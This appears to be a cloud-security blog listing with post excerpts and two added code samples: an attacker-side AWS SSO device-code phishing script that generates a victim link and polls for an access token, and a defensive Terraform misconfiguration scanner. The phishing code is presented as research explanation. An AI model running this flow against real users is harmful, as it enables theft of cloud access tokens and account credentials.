Kubernetes’ ‘allowPrivilegeEscalation’ is a useful but poorly understood security hardening setting. Let’s dive into how it works and debunk some common myths about it.
IMDSv2 enforcement: coming to a region near you!
A Tribute to Hadrien Milano
MitM at the Edge: Abusing Cloudflare Workers
Introducing Stratus Red Team, an Adversary Emulation Tool for the Cloud
Implementing a Vulnerable AWS DevOps Environment as a CloudGoat Scenario
I’m a huge fan of disposable security labs, both for offensive and defensive purposes (see: Automating the provisioning of Active Directory labs in Azure). After writing Cloud Security Breaches and Vulnerabilities: 2021 in Review, I wanted to build a “purposely vulnerable AWS lab” with a typical attack path including static, long-lived credentials and with a supply-chain security element.
Cloud Security Breaches and Vulnerabilities: 2021 in Review
Phishing for AWS credentials via AWS SSO device code authentication
When using AWS in an enterprise environment, best practice is to use a single sign-on service for identity and access management. AWS SSO is a popular choice: it integrates with third-party identity providers such as Okta and lets you centrally manage roles and permissions across multiple AWS accounts. In this post, we demonstrate that AWS SSO is vulnerable by design to device code authentication phishing, just like any identity provider that implements OpenID Connect device code authentication. This technique was first demonstrated by Dr. Nestori Syynimaa for Azure AD. The feature provides a powerful phishing vector for attackers, rendering ineffective controls such
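The device code flow the excerpt describes consists of three calls to the AWS SSO OIDC service: the attacker registers a public OIDC client, starts a device authorization to obtain a verification link, sends that link to the victim, and polls the token endpoint until the victim approves. The example below is added here to make that sequence concrete; it is not code from the original post. The operation names and request/response fields are those of the real `sso-oidc` API (the same ones boto3 exposes as `register_client`, `start_device_authorization` and `create_token`), while `FakeSsoOidcClient`, its URLs and its token values are constructed stand-ins so the flow runs offline. With boto3 installed the same `run_phish` function can be given `boto3.client("sso-oidc", region_name=...)` instead.

```python
"""Device-code phishing flow against AWS SSO (IAM Identity Center) OIDC.

Added example. The three operations (RegisterClient, StartDeviceAuthorization,
CreateToken) and their fields are the real sso-oidc API; FakeSsoOidcClient is a
constructed stand-in so the flow can be exercised offline.
"""
import time

DEVICE_CODE_GRANT = "urn:ietf:params:oauth:grant-type:device_code"


def register_client(oidc, client_name="device-flow-demo"):
    """Step 1: anyone can register a public OIDC client; no credentials needed."""
    resp = oidc.register_client(clientName=client_name, clientType="public")
    return resp["clientId"], resp["clientSecret"]


def start_device_auth(oidc, client_id, client_secret, start_url):
    """Step 2: start a device authorization for the victim's SSO start URL.

    verificationUriComplete already embeds the user code, so it is the single
    link the attacker needs to get the victim to click.
    """
    resp = oidc.start_device_authorization(
        clientId=client_id, clientSecret=client_secret, startUrl=start_url
    )
    return resp["deviceCode"], resp["verificationUriComplete"], resp["interval"], resp["expiresIn"]


def poll_for_token(oidc, client_id, client_secret, device_code, interval, expires_in, sleep=time.sleep):
    """Step 3: poll CreateToken until the victim approves, the code expires, or time runs out.

    Returns the CreateToken response dict, or None if no token was obtained.
    """
    max_polls = max(1, expires_in // interval)
    for _ in range(max_polls):
        try:
            return oidc.create_token(
                clientId=client_id, clientSecret=client_secret,
                grantType=DEVICE_CODE_GRANT, deviceCode=device_code,
            )
        except oidc.exceptions.AuthorizationPendingException:
            sleep(interval)              # victim has not approved yet
        except oidc.exceptions.SlowDownException:
            interval += 5                # RFC 8628: back off by 5 seconds
            sleep(interval)
        except oidc.exceptions.ExpiredTokenException:
            return None                  # device code expired unapproved
    return None


def run_phish(oidc, start_url, sleep=time.sleep):
    """Full attacker-side flow. The phishing link is what gets sent to the victim."""
    client_id, client_secret = register_client(oidc)
    device_code, link, interval, expires_in = start_device_auth(oidc, client_id, client_secret, start_url)
    token = poll_for_token(oidc, client_id, client_secret, device_code, interval, expires_in, sleep)
    return {"phishing_link": link, "access_token": token["accessToken"] if token else None}


class FakeSsoOidcClient:
    """Constructed offline stand-in for boto3's sso-oidc client (not a real endpoint)."""

    class exceptions:
        class AuthorizationPendingException(Exception): pass
        class SlowDownException(Exception): pass
        class ExpiredTokenException(Exception): pass

    def __init__(self, pending_polls=2):
        self.pending_polls = pending_polls   # how many polls return "pending" before approval
        self.calls = []

    def register_client(self, clientName, clientType):
        self.calls.append("RegisterClient")
        return {"clientId": "fake-client-id", "clientSecret": "fake-client-secret"}

    def start_device_authorization(self, clientId, clientSecret, startUrl):
        self.calls.append("StartDeviceAuthorization")
        return {"deviceCode": "fake-device-code", "userCode": "ABCD-EFGH",
                "verificationUri": "https://device.sso.us-east-1.amazonaws.com/",
                "verificationUriComplete": "https://device.sso.us-east-1.amazonaws.com/?user_code=ABCD-EFGH",
                "expiresIn": 600, "interval": 1}

    def create_token(self, clientId, clientSecret, grantType, deviceCode):
        self.calls.append("CreateToken")
        if self.pending_polls > 0:
            self.pending_polls -= 1
            raise self.exceptions.AuthorizationPendingException("authorization_pending")
        return {"accessToken": "fake-access-token", "tokenType": "Bearer", "expiresIn": 28800}


if __name__ == "__main__":
    fake = FakeSsoOidcClient(pending_polls=2)
    print(run_phish(fake, "https://example.awsapps.com/start", sleep=lambda s: None))
```

Two things worth noticing in the flow: the attacker never sees or needs the victim's password or MFA response, because the victim authenticates normally on the legitimate AWS SSO page before approving the device; and the resulting access token is an SSO portal token, so it can be exchanged via the `sso` API (`GetRoleCredentials`) for short-term credentials in any account and role the victim is allowed to use.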
Retrieving AWS security credentials from the AWS console
Shifting Cloud Security Left — Scanning Infrastructure as Code for Security Issues (last updated August 2023)
Companies running in the cloud typically describe their infrastructure as code using tools such as Terraform or CloudFormation. In this post, we review the landscape of tools that perform static analysis of Terraform code to identify cloud security issues and misconfigurations before the code is deployed, that is, before a misconfiguration becomes an actual security risk.
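To show what "static analysis of Terraform code" means in practice, here is a deliberately small scanner added as an illustration; it is not one of the tools reviewed in the post, nor the post's own code. It parses a subset of HCL (blocks with string labels, scalar and list attributes) and runs two rules over the resources: a security group ingress rule that exposes an administrative port to the world, and an S3 bucket with a public canned ACL. The Terraform snippet is constructed for the example (it uses the provider v3-style inline `acl` argument). The real tools do the same thing with a full HCL parser and hundreds of rules, but the shape is identical: parse, walk resources, evaluate rules, report findings before anything is applied.

```python
"""Minimal IaC static analysis over Terraform HCL. Added example, not a real tool."""
import re

# Constructed sample input (not from the original post).
SAMPLE_TF = '''
resource "aws_security_group" "web" {
  name = "web"
  ingress {
    from_port   = 22
    to_port     = 22
    protocol    = "tcp"
    cidr_blocks = ["0.0.0.0/0"]
  }
  ingress {
    from_port   = 443
    to_port     = 443
    protocol    = "tcp"
    cidr_blocks = ["0.0.0.0/0"]
  }
}

resource "aws_s3_bucket" "logs" {
  bucket = "example-logs"
  acl    = "public-read"
}

resource "aws_s3_bucket" "private" {
  bucket = "example-private"
  acl    = "private"
}
'''

BLOCK_RE = re.compile(r'^(\w+)((?:\s+"[^"]*")*)\s*\{$')   # e.g. resource "type" "name" {
ATTR_RE = re.compile(r'^(\w+)\s*=\s*(.+)$')               # e.g. from_port = 22


def parse_value(raw):
    """Parse a scalar or list-of-strings HCL value (subset: strings, ints, ["a", "b"])."""
    raw = raw.strip()
    if raw.startswith("["):
        return re.findall(r'"([^"]*)"', raw)
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    if raw.lstrip("-").isdigit():
        return int(raw)
    return raw


def parse_hcl(text):
    """Parse HCL blocks into dicts: {type, labels, attrs, blocks}. Subset parser."""
    lines = [l.strip() for l in text.splitlines() if l.strip() and not l.strip().startswith("#")]
    pos = 0

    def parse_body():
        nonlocal pos
        attrs, blocks = {}, []
        while pos < len(lines):
            line = lines[pos]
            pos += 1
            if line == "}":
                break
            m = BLOCK_RE.match(line)
            if m:
                labels = re.findall(r'"([^"]*)"', m.group(2))
                body_attrs, body_blocks = parse_body()
                blocks.append({"type": m.group(1), "labels": labels, "attrs": body_attrs, "blocks": body_blocks})
                continue
            m = ATTR_RE.match(line)
            if m:
                attrs[m.group(1)] = parse_value(m.group(2))
        return attrs, blocks

    return parse_body()[1]


WORLD_CIDRS = {"0.0.0.0/0", "::/0"}
PUBLIC_ACLS = {"public-read", "public-read-write", "authenticated-read"}
ADMIN_PORTS = {22: "SSH", 3389: "RDP"}


def check_security_group(res):
    """Flag ingress rules that expose an admin port (or all ports) to any address."""
    findings = []
    for rule in res["blocks"]:
        if rule["type"] != "ingress":
            continue
        a = rule["attrs"]
        cidrs = set(a.get("cidr_blocks", [])) | set(a.get("ipv6_cidr_blocks", []))
        if not cidrs & WORLD_CIDRS:
            continue
        lo, hi, all_traffic = a.get("from_port", 0), a.get("to_port", 65535), str(a.get("protocol")) in ("-1", "all")
        for port, name in ADMIN_PORTS.items():
            if all_traffic or lo <= port <= hi:
                findings.append(f"{name} (port {port}) open to the world")
    return findings


def check_s3_bucket(res):
    """Flag buckets whose canned ACL grants public or any-authenticated-AWS-user access."""
    acl = res["attrs"].get("acl")
    return [f"bucket ACL '{acl}' grants public access"] if acl in PUBLIC_ACLS else []


RULES = {"aws_security_group": check_security_group, "aws_s3_bucket": check_s3_bucket}


def scan(text):
    """Return (resource_address, message) findings for every resource matched by a rule."""
    findings = []
    for block in parse_hcl(text):
        if block["type"] != "resource" or len(block["labels"]) != 2:
            continue
        rtype, rname = block["labels"]
        for msg in RULES.get(rtype, lambda r: [])(block):
            findings.append((f"{rtype}.{rname}", msg))
    return findings


if __name__ == "__main__":
    for address, msg in scan(SAMPLE_TF):
        print(f"{address}: {msg}")
```

Note that the 443 ingress open to the world produces no finding: a useful rule set encodes intent (public HTTPS is normal, public SSH is not) rather than flagging every `0.0.0.0/0`, which is what separates a scanner teams keep running in CI from one they disable after a week of noise.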